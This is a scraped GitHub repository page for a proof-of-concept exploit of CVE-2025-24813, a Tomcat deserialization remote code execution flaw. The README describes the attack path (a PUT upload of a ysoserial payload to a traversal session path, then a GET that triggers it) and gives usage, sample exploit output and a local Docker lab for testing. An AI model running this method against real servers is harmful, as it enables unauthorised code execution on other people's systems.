8000 GitHub - jleem99/POC-CVE-2025-24813: his repository contains an automated Proof of Concept (PoC) script for exploiting **CVE-2025-24813**, a Remote Code Execution (RCE) vulnerability in Apache Tomcat. The vulnerability allows an attacker to upload a malicious serialized payload to the server, leading to arbitrary code execution via deserialization when specific conditions are met.
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
/ POC-CVE-2025-24813 Public
forked from absholi7ly/POC-CVE-2025-24813

his repository contains an automated Proof of Concept (PoC) script for exploiting **CVE-2025-24813**, a Remote Code Execution (RCE) vulnerability in Apache Tomcat. The vulnerability allows an attacker to upload a malicious serialized payload to the server, leading to arbitrary code execution via deserialization when specific conditions are met.

License

Apache-2.0 license
0 stars 31 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

jleem99/POC-CVE-2025-24813

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
.gitignore
.gitignore
 
 
CVE_2025_24813.py
CVE_2025_24813.py
 
 
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 
run_test.sh
run_test.sh
 
 
setup.sh
setup.sh
 
 

Repository files navigation

CVE-2025-24813 Apache Tomcat RCE PoC

Proof of Concept (PoC) exploiting CVE-2025-24813, a Remote Code Execution (RCE) vulnerability in Apache Tomcat. The vulnerability allows an attacker to upload a malicious serialized payload to the server, leading to arbitrary code execution via deserialization when specific conditions are met.

Description

CVE-2025-24813 is a theoretical RCE vulnerability in Apache Tomcat that leverages improper handling of uploaded session files and deserialization mechanisms. By uploading a crafted payload to a writable directory (e.g., /uploads/../sessions/), an attacker can trigger deserialization, resulting in the execution of arbitrary commands on the target server.

Prerequisites for Successful Exploitation

For this PoC to successfully exploit the vulnerability, the following conditions must be met:

  1. Apache Tomcat Version: The target must be running a vulnerable version of Apache Tomcat.
  2. Writable Directory: The server must allow PUT requests
  3. Deserialization Trigger: The server must process the uploaded session file (e.g., via a GET request to /index.jsp) and trigger deserialization of the payload.
  4. Java Environment: The attacker’s machine must have Java installed to generate payloads using ysoserial or compile Java-based payloads.
  5. ysoserial (Optional): If using the ysoserial payload type, the ysoserial.jar file must be available locally.
python CVE-2025-24813.py <target_url> [options]

Output

  • Successful Exploit:
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
  • Failed Exploit:
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser

Running the PoC

./setup.sh # Build and start the vulnerable Tomcat container
./run_test.sh # Run the exploit with basic payload

About

his repository contains an automated Proof of Concept (PoC) script for exploiting **CVE-2025-24813**, a Remote Code Execution (RCE) vulnerability in Apache Tomcat. The vulnerability allows an attacker to upload a malicious serialized payload to the server, leading to arbitrary code execution via deserialization when specific conditions are met.

Resources

Readme

License

Apache-2.0 license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 67.9%
  • Dockerfile 18.9%
  • Shell 13.2%
0